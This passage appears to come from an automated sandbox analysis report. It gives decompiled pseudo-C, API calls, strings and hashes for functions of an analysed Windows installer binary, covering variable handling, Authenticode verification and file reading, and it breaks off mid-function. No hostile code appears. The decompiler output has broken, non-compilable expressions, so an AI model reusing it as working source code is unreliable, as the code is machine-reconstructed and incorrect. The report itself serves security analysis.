                                                                                                                                                                  • Associated: 00000000.00000002.256755399.000000000043B000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.257304277.0000000000456000.00000004.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.257317891.000000000045C000.00000002.00020000.sdmp Download File
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: CurrentErrorLastProcess$CompareCreateDuplicateFileHandleString
                                                                                                                                                                  • String ID: <the>.cab$Failed to add virtual file pointer for cab container.$Failed to duplicate handle to cab container.$Failed to open cabinet file: %hs$cabextract.cpp
                                                                                                                                                                  • API String ID: 3030546534-3446344238
                                                                                                                                                                  • Opcode ID: 5e3529061ee69e73117273eda674a156fab4787b5033404564bd8d00942dad13
                                                                                                                                                                  • Instruction ID: f02bfdc93b0fa605585d6aead4254c02a75e2ab6674224579056cb22445fd439
                                                                                                                                                                  • Opcode Fuzzy Hash: 5e3529061ee69e73117273eda674a156fab4787b5033404564bd8d00942dad13
                                                                                                                                                                  • Instruction Fuzzy Hash: 6E31F932A00234BFEB119F65AC09F5B7AA8FF097A1F110226FD04F7150C7799E0086E8
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 00403680, Relevance: 19.7, APIs: 2, Strings: 11, Instructions: 153COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  C-Code - Quality: 37%
                                                                                                                                                                  			E00403680(void* __ecx, struct _CRITICAL_SECTION* _a4, intOrPtr _a8, signed int* _a12, intOrPtr _a16, intOrPtr _a20) {
				signed int _v8;
				unsigned int _v12;
				signed int _t35;
				void* _t45;
				void* _t47;
				struct _CRITICAL_SECTION* _t59;
				void* _t60;
				signed int _t62;
				signed int _t67;
				intOrPtr _t70;
				unsigned int _t71;
				intOrPtr _t73;
				void* _t74;
				signed int* _t75;
				void* _t76;

				_t60 = __ecx;
				_v8 = _v8 & 0x00000000;
				_t59 = _a4;
				EnterCriticalSection(_t59);
				_t73 = _a8;
				_t74 = E004020A3(_t60, _t59, _t73,  &_v8);
				if(_t74 >= 0) {
					if(_t74 != 1) {
						_t35 = _v8;
						_t70 =  *((intOrPtr*)(_t59 + 0x20));
						_t62 = _t35 * 0x30;
						if( *((intOrPtr*)(_t62 + _t70 + 0x20)) == 0 || _a16 == 1 || _a16 == 2 &&  *((intOrPtr*)(_t62 + _t70 + 0x1c)) != 0) {
							L11:
							_t75 = _a12;
							if(_a20 != 0 && _a16 == 0) {
								if( *((intOrPtr*)(_t35 * 0x30 +  *((intOrPtr*)(_t59 + 0x20)) + 0x18)) == 0) {
									_t45 = _t75[2] - 1;
									if(_t45 == 0) {
										_push(_t75[1]);
										_push( *_t75);
										E00430F28(2, "Setting numeric variable \'%ls\' to value %lld", _t73);
										_t76 = _t76 + 0x14;
									} else {
										_t47 = _t45 - 1;
										if(_t47 == 0) {
											if( *_t75 != 0) {
												_push( *_t75);
												_push(_t73);
												_push("Setting string variable \'%ls\' to value \'%ls\'");
											} else {
												_push(0);
												_push(_t73);
												_push("Unsetting variable \'%ls\'");
											}
											_push(2);
											E00430F28();
											_t76 = _t76 + 0x10;
										} else {
											if(_t47 == 1) {
												_t67 =  *_t75;
												_t71 = _t75[1];
												_push(_t67 & 0x0000ffff);
												_push((_t71 << 0x00000020 | _t67) >> 0x10 & 0x0000ffff);
												_push(_t71 & 0x0000ffff);
												_v12 = _t71;
												_push(_t71 >> 0x10);
												E00430F28(2, "Setting version variable \'%ls\' to value \'%hu.%hu.%hu.%hu\'", _t73);
												_t76 = _t76 + 0x1c;
											}
										}
									}
								} else {
									E00430F28(2, "Setting hidden variable \'%ls\'", _t73);
									_t76 = _t76 + 0xc;
								}
							}
							_t74 = E00418BE2(_t75,  *((intOrPtr*)(_t59 + 0x20)) + 8 + _v8 * 0x30);
							if(_t74 >= 0) {
								goto L27;
							} else {
								_push(_t73);
								_push("Failed to set value of variable: %ls");
								goto L26;
							}
						} else {
							_t74 = 0x80070057;
							E004300D9(_t35, "variable.cpp", 0x526, 0x80070057);
							_push(_t73);
							_push("Attempt to set built-in variable value: %ls");
							goto L26;
						}
					}
					_t74 = E0040348A(_v8, _t59, _t73, _v8);
					if(_t74 >= 0) {
						_t35 = _v8;
						goto L11;
					} else {
						_push(_t73);
						_push("Failed to insert variable \'%ls\'.");
						goto L26;
					}
				} else {
					_push(_t73);
					_push("Failed to find variable value \'%ls\'.");
					L26:
					_push(_t74);
					E00430A57();
					_t76 = _t76 + 0xc;
					L27:
					LeaveCriticalSection(_t59);
					if(_t74 < 0 && _a20 != 0) {
						_push(_t74);
						E00430F28(2, "Setting variable failed: ID \'%ls\', HRESULT 0x%x", _t73);
					}
					return _t74;
				}
			}


















                                                                                                                                                                  0x00403680
                                                                                                                                                                  0x00403686
                                                                                                                                                                  0x0040368b
                                                                                                                                                                  0x00403691
                                                                                                                                                                  0x00403697
                                                                                                                                                                  0x004036a5
                                                                                                                                                                  0x004036a9
                                                                                                                                                                  0x004036b9
                                                                                                                                                                  0x004036d7
                                                                                                                                                                  0x004036da
                                                                                                                                                                  0x004036df
                                                                                                                                                                  0x004036e7
                                                                                                                                                                  0x0040371f
                                                                                                                                                                  0x00403723
                                                                                                                                                                  0x00403726
                                                                                                                                                                  0x00403743
                                                                                                                                                                  0x0040375a
                                                                                                                                                                  0x0040375b
                                                                                                                                                                  0x004037b9
                                                                                                                                                                  0x004037bc
                                                                                                                                                                  0x004037c6
                                                                                                                                                                  0x004037cb
                                                                                                                                                                  0x0040375d
                                                                                                                                                                  0x0040375d
                                                                                                                                                                  0x0040375e
                                                                                                                                                                  0x00403799
                                                                                                                                                                  0x004037a5
                                                                                                                                                                  0x004037a7
                                                                                                                                                                  0x004037a8
                                                                                                                                                                  0x0040379b
                                                                                                                                                                  0x0040379b
                                                                                                                                                                  0x0040379d
                                                                                                                                                                  0x0040379e
                                                                                                                                                                  0x0040379e
                                                                                                                                                                  0x004037ad
                                                                                                                                                                  0x004037af
                                                                                                                                                                  0x004037b4
                                                                                                                                                                  0x00403760
                                                                                                                                                                  0x00403761
                                                                                                                                                                  0x00403763
                                                                                                                                                                  0x00403765
                                                                                                                                                                  0x0040376b
                                                                                                                                                                  0x00403778
                                                                                                                                                                  0x0040377c
                                                                                                                                                                  0x0040377d
                                                                                                                                                                  0x00403783
                                                                                                                                                                  0x0040378c
                                                                                                                                                                  0x00403791
                                                                                                                                                                  0x00403791
                                                                                                                                                                  0x00403761
                                                                                                                                                                  0x0040375e
                                                                                                                                                                  0x00403745
                                                                                                                                                                  0x0040374d
                                                                                                                                                                  0x00403752
                                                                                                                                                                  0x00403752
                                                                                                                                                                  0x00403743
                                                                                                                                                                  0x004037e3
                                                                                                                                                                  0x004037e7
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x004037e9
                                                                                                                                                                  0x004037e9
                                                                                                                                                                  0x004037ea
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x004037ea
                                                                                                                                                                  0x004036fc
                                                                                                                                                                  0x004036fc
                                                                                                                                                                  0x0040370c
                                                                                                                                                                  0x00403711
                                                                                                                                                                  0x00403712
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00403712
                                                                                                                                                                  0x004036e7
                                                                                                                                                                  0x004036c6
                                                                                                                                                                  0x004036ca
                                                                                                                                                                  0x0040371c
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x004036cc
                                                                                                                                                                  0x004036cc
                                                                                                                                                                  0x004036cd
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x004036cd
                                                                                                                                                                  0x004036ab
                                                                                                                                                                  0x004036ab
                                                                                                                                                                  0x004036ac
                                                                                                                                                                  0x004037ef
                                                                                                                                                                  0x004037ef
                                                                                                                                                                  0x004037f0
                                                                                                                                                                  0x004037f5
                                                                                                                                                                  0x004037f8
                                                                                                                                                                  0x004037f9
                                                                                                                                                                  0x00403801
                                                                                                                                                                  0x00403809
                                                                                                                                                                  0x00403812
                                                                                                                                                                  0x00403817
                                                                                                                                                                  0x00403820
                                                                                                                                                                  0x00403820

                                                                                                                                                                  APIs
                                                                                                                                                                  • EnterCriticalSection.KERNEL32(00000001,004021A3,00000000,00401E67,00000000,00000001), ref: 00403691
                                                                                                                                                                    • Part of subcall function 004020A3: CompareStringW.KERNEL32(0000007F,00001000,?,000000FF,?,000000FF,00000030,00000000,00000030,00402EC5,00402EC5,?,0040203E,00000030,?,00000000), ref: 004020DF
                                                                                                                                                                    • Part of subcall function 004020A3: GetLastError.KERNEL32(?,0040203E,00000030,?,00000000,00000000,00000007,00402EC5,?,00404461,?,?,?,00000030), ref: 00402108
                                                                                                                                                                  • LeaveCriticalSection.KERNEL32(00000001,00000001,?), ref: 004037F9
                                                                                                                                                                  Strings
                                                                                                                                                                  • Setting string variable '%ls' to value '%ls', xrefs: 004037A8
                                                                                                                                                                  • Setting numeric variable '%ls' to value %lld, xrefs: 004037BF
                                                                                                                                                                  • variable.cpp, xrefs: 00403707
                                                                                                                                                                  • Attempt to set built-in variable value: %ls, xrefs: 00403712
                                                                                                                                                                  • Failed to set value of variable: %ls, xrefs: 004037EA
                                                                                                                                                                  • Setting hidden variable '%ls', xrefs: 00403746
                                                                                                                                                                  • Unsetting variable '%ls', xrefs: 0040379E
                                                                                                                                                                  • Setting version variable '%ls' to value '%hu.%hu.%hu.%hu', xrefs: 00403785
                                                                                                                                                                  • Failed to find variable value '%ls'., xrefs: 004036AC
                                                                                                                                                                  • Setting variable failed: ID '%ls', HRESULT 0x%x, xrefs: 0040380B
                                                                                                                                                                  • Failed to insert variable '%ls'., xrefs: 004036CD
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.255488985.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.255471614.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.256374653.0000000000427000.00000040.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.256545154.0000000000429000.00000080.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.256755399.000000000043B000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.257304277.0000000000456000.00000004.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.257317891.000000000045C000.00000002.00020000.sdmp Download File
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: CriticalSection$CompareEnterErrorLastLeaveString
                                                                                                                                                                  • String ID: Attempt to set built-in variable value: %ls$Failed to find variable value '%ls'.$Failed to insert variable '%ls'.$Failed to set value of variable: %ls$Setting hidden variable '%ls'$Setting numeric variable '%ls' to value %lld$Setting string variable '%ls' to value '%ls'$Setting variable failed: ID '%ls', HRESULT 0x%x$Setting version variable '%ls' to value '%hu.%hu.%hu.%hu'$Unsetting variable '%ls'$variable.cpp
                                                                                                                                                                  • API String ID: 2716280545-445000439
                                                                                                                                                                  • Opcode ID: 05738eec3109951b30c0180e30c3c799f969fd4ce4a01d5b3647799a702fd8f9
                                                                                                                                                                  • Instruction ID: 5a0d39312afa77466f928b4d3d30b79b338dd9084fe5159fdf1a40fc51a11c1c
                                                                                                                                                                  • Opcode Fuzzy Hash: 05738eec3109951b30c0180e30c3c799f969fd4ce4a01d5b3647799a702fd8f9
                                                                                                                                                                  • Instruction Fuzzy Hash: FC41D7F1A40215BBDB349E05CC4AF6B7AACDB98B06F10512FF841772C1D27C9E41CAA9
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 004141E9, Relevance: 19.4, APIs: 6, Strings: 5, Instructions: 137COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  C-Code - Quality: 58%
                                                                                                                                                                  			E004141E9(void* __ecx, void* __edx, void* __eflags, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				signed int _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				struct _EXCEPTION_POINTERS _v24;
				intOrPtr _v28;
				intOrPtr _v36;
				intOrPtr _v40;
				char _v44;
				signed int _v52;
				intOrPtr _v60;
				intOrPtr _v64;
				char* _v68;
				intOrPtr _v72;
				intOrPtr _v80;
				void _v92;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t32;
				signed short _t41;
				signed short _t46;
				signed short _t49;
				intOrPtr _t57;
				void _t68;
				intOrPtr _t69;
				signed short _t73;
				signed short _t76;
				signed int _t80;

				_t32 =  *0x4560d0; // 0xae480e18
				_v8 = _t32 ^ _t80;
				_t57 = _a8;
				_t69 = _a12;
				_v28 = _a4;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_t68 = 0x30;
				_push(_t68);
				_push(0);
				_push( &_v92);
				_v24 = 0xaac56b;
				_v20 = 0x11d0cd44;
				_v16 = 0xc000c28c;
				_v12 = 0xee95c24f;
				E004267C0(_t57, __ecx, _t68, _t69, __eflags);
				_v68 =  &_v44;
				_v44 = 0x10;
				_v40 = _t57;
				_v36 = _t69;
				_v92 = _t68;
				_v72 = 1;
				_v64 = 1;
				_v52 = 0x80;
				_v80 = 2;
				_t41 = WinVerifyTrust(0xffffffff,  &_v24,  &_v92);
				if(_t41 == 0) {
					L3:
					_push(_v60);
					L0042FF88();
					__eflags = _t41;
					if(_t41 != 0) {
						_push(0);
						_push(0);
						_push(0);
						_push(_t41);
						L0042FF82();
						__eflags = _t41;
						if(_t41 != 0) {
							_t70 = E004129F9(_v28,  *((intOrPtr*)(_t41 + 0x28)));
							__eflags = _t70;
							if(_t70 < 0) {
								_push("Failed to verify expected payload against actual certificate chain.");
								goto L9;
							}
						} else {
							_t46 = GetLastError();
							__eflags = _t46;
							_t73 =  <=  ? _t46 : _t46 & 0x0000ffff | 0x80070000;
							__eflags = _t73;
							_t70 =  >=  ? 0x80004005 : _t73;
							E004300D9(0x80004005, "cache.cpp", 0x3cc, _t70);
							_push("Failed to get signer chain from authenticode certificate.");
							goto L9;
						}
					} else {
						_t49 = GetLastError();
						__eflags = _t49;
						_t76 =  <=  ? _t49 : _t49 & 0x0000ffff | 0x80070000;
						__eflags = _t76;
						_t70 =  >=  ? 0x80004005 : _t76;
						E004300D9(0x80004005, "cache.cpp", 0x3c9, _t70);
						_push("Failed to get provider state from authenticode certificate.");
						L9:
						_push(_t70);
						E00430A57();
					}
				} else {
					_v52 = _v52 | 0x00001000;
					_t41 = WinVerifyTrust(0xffffffff,  &_v24,  &_v92);
					if(_t41 == 0) {
						goto L3;
					} else {
						_t79 =  <=  ? _t41 : _t41 & 0x0000ffff | 0x80070000;
						_t70 =  >=  ? 0x80004005 :  <=  ? _t41 : _t41 & 0x0000ffff | 0x80070000;
						E004300D9(0x80004005, "cache.cpp", 0x3c5,  >=  ? 0x80004005 :  <=  ? _t41 : _t41 & 0x0000ffff | 0x80070000);
						E00430A57( >=  ? 0x80004005 :  <=  ? _t41 : _t41 & 0x0000ffff | 0x80070000, "Failed authenticode verification of payload: %ls", _t57);
					}
				}
				return L004267AF(_t70, _v8 ^ _t80, _t68, _t70);
			}
































                                                                                                                                                                  0x004141ef
                                                                                                                                                                  0x004141f6
                                                                                                                                                                  0x004141fd
                                                                                                                                                                  0x00414202
                                                                                                                                                                  0x00414205
                                                                                                                                                                  0x0041420d
                                                                                                                                                                  0x0041420e
                                                                                                                                                                  0x0041420f
                                                                                                                                                                  0x00414212
                                                                                                                                                                  0x00414213
                                                                                                                                                                  0x00414214
                                                                                                                                                                  0x00414218
                                                                                                                                                                  0x0041421a
                                                                                                                                                                  0x0041421b
                                                                                                                                                                  0x00414222
                                                                                                                                                                  0x00414229
                                                                                                                                                                  0x00414230
                                                                                                                                                                  0x00414237
                                                                                                                                                                  0x00414242
                                                                                                                                                                  0x00414252
                                                                                                                                                                  0x00414259
                                                                                                                                                                  0x0041425c
                                                                                                                                                                  0x0041425f
                                                                                                                                                                  0x00414262
                                                                                                                                                                  0x00414265
                                                                                                                                                                  0x00414268
                                                                                                                                                                  0x0041426f
                                                                                                                                                                  0x00414276
                                                                                                                                                                  0x0041427d
                                                                                                                                                                  0x004142d5
                                                                                                                                                                  0x004142d5
                                                                                                                                                                  0x004142d8
                                                                                                                                                                  0x004142dd
                                                                                                                                                                  0x004142df
                                                                                                                                                                  0x00414318
                                                                                                                                                                  0x00414319
                                                                                                                                                                  0x0041431a
                                                                                                                                                                  0x0041431b
                                                                                                                                                                  0x0041431c
                                                                                                                                                                  0x00414321
                                                                                                                                                                  0x00414323
                                                                                                                                                                  0x00414365
                                                                                                                                                                  0x00414367
                                                                                                                                                                  0x00414369
                                                                                                                                                                  0x0041436b
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0041436b
                                                                                                                                                                  0x00414325
                                                                                                                                                                  0x00414325
                                                                                                                                                                  0x00414334
                                                                                                                                                                  0x00414336
                                                                                                                                                                  0x0041433e
                                                                                                                                                                  0x00414340
                                                                                                                                                                  0x0041434e
                                                                                                                                                                  0x00414353
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00414353
                                                                                                                                                                  0x004142e1
                                                                                                                                                                  0x004142e1
                                                                                                                                                                  0x004142f0
                                                                                                                                                                  0x004142f2
                                                                                                                                                                  0x004142fa
                                                                                                                                                                  0x004142fc
                                                                                                                                                                  0x0041430a
                                                                                                                                                                  0x0041430f
                                                                                                                                                                  0x00414370
                                                                                                                                                                  0x00414370
                                                                                                                                                                  0x00414371
                                                                                                                                                                  0x00414377
                                                                                                                                                                  0x0041427f
                                                                                                                                                                  0x0041427f
                                                                                                                                                                  0x00414290
                                                                                                                                                                  0x00414297
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00414299
                                                                                                                                                                  0x004142a4
                                                                                                                                                                  0x004142ae
                                                                                                                                                                  0x004142bc
                                                                                                                                                                  0x004142c8
                                                                                                                                                                  0x004142cd
                                                                                                                                                                  0x00414297
                                                                                                                                                                  0x00414388

                                                                                                                                                                  APIs
                                                                                                                                                                  • WinVerifyTrust.WINTRUST(000000FF,00AAC56B,?,00401DDF,00000000,00401F17,?,00401E27,?), ref: 00414276
                                                                                                                                                                  • WinVerifyTrust.WINTRUST(000000FF,00AAC56B,?,000000FF,00AAC56B,?,00401DDF,00000000,00401F17,?,00401E27,?), ref: 00414290
                                                                                                                                                                  • WTHelperProvDataFromStateData.WINTRUST(00401E67,000000FF,00AAC56B,?,00401DDF,00000000,00401F17,?,00401E27,?), ref: 004142D8
                                                                                                                                                                  • GetLastError.KERNEL32(00401E67,000000FF,00AAC56B,?,00401DDF,00000000,00401F17,?,00401E27,?), ref: 004142E1
                                                                                                                                                                  • WTHelperGetProvSignerFromChain.WINTRUST(00000000,00000000,00000000,00000000,00401E67,000000FF,00AAC56B,?,00401DDF,00000000,00401F17,?,00401E27,?), ref: 0041431C
                                                                                                                                                                  • GetLastError.KERNEL32(00000000,00000000,00000000,00000000,00401E67,000000FF,00AAC56B,?,00401DDF,00000000,00401F17,?,00401E27,?), ref: 00414325
                                                                                                                                                                  Strings
                                                                                                                                                                  • Failed to verify expected payload against actual certificate chain., xrefs: 0041436B
                                                                                                                                                                  • Failed to get provider state from authenticode certificate., xrefs: 0041430F
                                                                                                                                                                  • Failed to get signer chain from authenticode certificate., xrefs: 00414353
                                                                                                                                                                  • cache.cpp, xrefs: 004142B7, 00414305, 00414349
                                                                                                                                                                  • Failed authenticode verification of payload: %ls, xrefs: 004142C2
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.255488985.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.255471614.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.256374653.0000000000427000.00000040.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.256545154.0000000000429000.00000080.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.256755399.000000000043B000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.257304277.0000000000456000.00000004.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.257317891.000000000045C000.00000002.00020000.sdmp Download File
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: DataErrorFromHelperLastProvTrustVerify$ChainSignerState
                                                                                                                                                                  • String ID: Failed authenticode verification of payload: %ls$Failed to get provider state from authenticode certificate.$Failed to get signer chain from authenticode certificate.$Failed to verify expected payload against actual certificate chain.$cache.cpp
                                                                                                                                                                  • API String ID: 2293613592-2590768268
                                                                                                                                                                  • Opcode ID: 6b8e0e5b57ba2d93ba96d4fd9e71160f4255b35cd6a74511048f626a6bbc09ea
                                                                                                                                                                  • Instruction ID: 66b943aca354b28f127c7878887bc7f751d5460377a0ac85937b0cd035f2a077
                                                                                                                                                                  • Opcode Fuzzy Hash: 6b8e0e5b57ba2d93ba96d4fd9e71160f4255b35cd6a74511048f626a6bbc09ea
                                                                                                                                                                  • Instruction Fuzzy Hash: C441A871A00228ABEB109BA5DC05BDFB6F8AF08354F11022BFD05F7181D77899448AE9
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 00412E07, Relevance: 19.4, APIs: 3, Strings: 8, Instructions: 101fileCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • CreateFileW.KERNEL32(?,80000000,00000005,00000000,00000003,08000000,00000000,?,00000000,?,00413E6B,?,00000000,?,?,00421953), ref: 00412E22
                                                                                                                                                                  • GetLastError.KERNEL32(?,00413E6B,?,00000000,?,?,00421953,?,00000000,?,00000000,?,?,00421953,?), ref: 00412E30
                                                                                                                                                                  • CloseHandle.KERNEL32(?,00421953,00000001,00000003,000007D0,?,?,00421953,?), ref: 00412F0F
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.255488985.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.255471614.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.256374653.0000000000427000.00000040.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.256545154.0000000000429000.00000080.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.256755399.000000000043B000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.257304277.0000000000456000.00000004.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.257317891.000000000045C000.00000002.00020000.sdmp Download File
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: CloseCreateErrorFileHandleLast
                                                                                                                                                                  • String ID: %ls container from working path '%ls' to path '%ls'$Copying$Failed to copy %ls to %ls$Failed to move %ls to %ls$Failed to open container in working path: %ls$Failed to verify container hash: %ls$Moving$cache.cpp
                                                                                                                                                                  • API String ID: 2528220319-1187406825
                                                                                                                                                                  • Opcode ID: f7ab91514021e2b35ebecff07638ae6753867f2d77399f3f68a1adcbacb5cb1e
                                                                                                                                                                  • Instruction ID: a3640cd88ee39286d533907b397290679641852c8ca6f4f5b096c4a2ba5fb8a0
                                                                                                                                                                  • Opcode Fuzzy Hash: f7ab91514021e2b35ebecff07638ae6753867f2d77399f3f68a1adcbacb5cb1e
                                                                                                                                                                  • Instruction Fuzzy Hash: F5214872A407207BEB2129159C46FAB356CDF45B28F11011BFE04FA2C2D7A98C2195ED
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 00436B86, Relevance: 17.7, APIs: 9, Strings: 1, Instructions: 246fileCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  C-Code - Quality: 78%
                                                                                                                                                                  			E00436B86(signed short _a4, signed short* _a8, long _a12, long _a16, long _a20, signed short _a24, signed short _a28) {
				void* _v8;
				signed short _v12;
				char _v16;
				WCHAR* _t36;
				signed short _t38;
				void* _t41;
				signed short _t45;
				signed short _t49;
				signed short _t50;
				long _t60;
				signed short _t61;
				signed short _t65;
				signed short _t68;
				signed short _t73;
				intOrPtr _t76;
				void* _t77;
				long _t78;
				signed short _t82;
				long _t83;
				signed short _t85;
				void* _t86;
				signed short* _t87;
				signed short _t88;
				signed short _t91;
				signed short _t96;
				signed short _t97;

				_t83 = 0;
				_v16 = 0;
				_v12 = 0;
				if(_a8 != 0) {
					__eflags = _a4;
					if(_a4 != 0) {
						_t36 = _a12;
						__eflags = _t36;
						if(_t36 != 0) {
							__eflags = 0 -  *_t36;
							if(0 !=  *_t36) {
								_t86 = CreateFileW(_t36, 0x80000000, 5, 0, 3, 0x8000080, 0);
								_v8 = _t86;
								__eflags = _t86 - 0xffffffff;
								if(_t86 != 0xffffffff) {
									L14:
									_t38 =  &_v16;
									__imp__GetFileSizeEx(_t86, _t38);
									__eflags = _t38;
									if(_t38 != 0) {
										__eflags = _a16 - _t83;
										if(_a16 == _t83) {
											L25:
											__eflags = _a28;
											if(_a28 == 0) {
												_t76 = _v16;
												_t39 = _v12;
												_t73 = _t76 - _t83;
												_t77 = _t76 - _t83;
												_push(0);
												_pop(0);
												asm("sbb eax, edi");
												__eflags = 0 - _v12;
												if(__eflags > 0) {
													L27:
													_t87 = _a4;
													__eflags =  *_t87;
													if( *_t87 == 0) {
														__eflags = _t73;
														if(_t73 == 0) {
															L30:
															_t88 = 0;
															 *_a8 = 0;
															L51:
															_t41 = _v8;
															__eflags = _t41 - 0xffffffff;
															if(_t41 != 0xffffffff) {
																CloseHandle(_t41);
															}
															L53:
															goto L54;
														}
														_t85 = E00431078(_t73, 1);
														__eflags = _t85;
														if(_t85 != 0) {
															L40:
															_t78 = 0;
															_t45 = 0;
															_a24 = 0;
															_a12 = 0;
															while(1) {
																_a16 = _t78;
																_t88 = E0043657C(_t73, _t45,  &_a16);
																__eflags = _t88;
																if(_t88 < 0) {
																	break;
																}
																_t49 = ReadFile(_v8, _a24 + _t85, _a16,  &_a12, 0);
																__eflags = _t49;
																if(_t49 == 0) {
																	_t50 = GetLastError();
																	__eflags = _t50;
																	_t91 =  <=  ? _t50 : _t50 & 0x0000ffff | 0x80070000;
																	__eflags = _t91;
																	_t88 =  >=  ? 0x80004005 : _t91;
																	__eflags = _t88;
																	E004300D9(0x80004005, "fileutil.cpp", 0x39f, _t88);
																	break;
																}
																_t45 = _a24 + _a12;
																__eflags = _a12;
																_a24 = _t45;
																if(_a12 != 0) {
																	_t78 = 0;
																	__eflags = 0;
																	continue;
																}
																__eflags = _t45 - _t73;
																if(_t45 == _t73) {
																	 *_a4 = _t85;
																	_t85 = 0;
																	 *_a8 = _t73;
																} else {
																	_t88 = 0x8000ffff;
																}
																break;
															}
															__eflags = _t85;
															if(_t85 != 0) {
																E00431137(_t85);
															}
															goto L51;
														}
														_t39 = 0x8007000e;
														_push(0x8007000e);
														_t88 = 0x8007000e;
														_push(0x392);
														L16:
														_push("fileutil.cpp");
														E004300D9(_t39);
														goto L51;
													}
													__eflags = _t73;
													if(_t73 != 0) {
														_t85 = E0043120C( *_t87, _t73, 1);
														__eflags = _t85;
														if(_t85 != 0) {
															goto L40;
														}
														_t39 = 0x8007000e;
														_push(0x8007000e);
														_t88 = 0x8007000e;
														_push(0x385);
														goto L16;
													}
													E00431137( *_t87);
													 *_t87 = 0;
													goto L30;
												}
												if(__eflags < 0) {
													L34:
													_t88 = 0x8007007a;
													_push(0x8007007a);
													_push(0x377);
													goto L16;
												}
												__eflags = _a24 - _t77;
												if(_a24 >= _t77) {
													goto L27;
												}
												goto L34;
											}
											_t73 = _a24;
											__eflags = 0;
											goto L27;
										}
										_t83 = _a20;
										__eflags = 0 - _v12;
										if(__eflags < 0) {
											L22:
											_t60 = SetFilePointer(_t86, _t83, 0, 1);
											__eflags = _t60 - 0xffffffff;
											if(_t60 != 0xffffffff) {
												goto L25;
											}
											_t39 = GetLastError();
											__eflags = _t39;
											_t88 =  <=  ? _t39 : _t39 & 0x0000ffff | 0x80070000;
											__eflags = _t88;
											if(_t88 >= 0) {
												goto L25;
											}
											_push(_t88);
											_push(0x365);
											goto L16;
										}
										if(__eflags > 0) {
											L21:
											_t88 = 0x80070057;
											goto L51;
										}
										__eflags = _t83 - _v16;
										if(_t83 <= _v16) {
											goto L22;
										}
										goto L21;
									}
									_t61 = GetLastError();
									__eflags = _t61;
									_t96 =  <=  ? _t61 : _t61 & 0x0000ffff | 0x80070000;
									_t39 = 0x80004005;
									__eflags = _t96;
									_t88 =  >=  ? 0x80004005 : _t96;
									_push(_t88);
									_push(0x357);
									goto L16;
								}
								_t82 = GetLastError();
								__eflags = _t82;
								_t65 =  <=  ? _t82 : _t82 & 0x0000ffff | 0x80070000;
								_t88 = 0x80070002;
								__eflags = _t65 - 0x80070002;
								if(_t65 == 0x80070002) {
									goto L53;
								}
								__eflags = _t82;
								if(_t82 == 0) {
									_t86 = _v8;
									goto L14;
								}
								_t97 = _t65;
								__eflags = _t97;
								_t88 =  >=  ? 0x80004005 : _t97;
								E004300D9(0x80004005, "fileutil.cpp", 0x352, _t88);
								goto L53;
							}
							_t68 = 0x80070057;
							_push(0x80070057);
							_push(0x348);
							goto L2;
						}
						_t68 = 0x80070057;
						_push(0x80070057);
						_push(0x347);
					} else {
						_t68 = 0x80070057;
						_push(0x80070057);
						_push(0x346);
					}
					goto L2;
				} else {
					_t68 = 0x80070057;
					_push(0x80070057);
					_push(0x345);
					L2:
					_push("fileutil.cpp");
					_t88 = _t68;
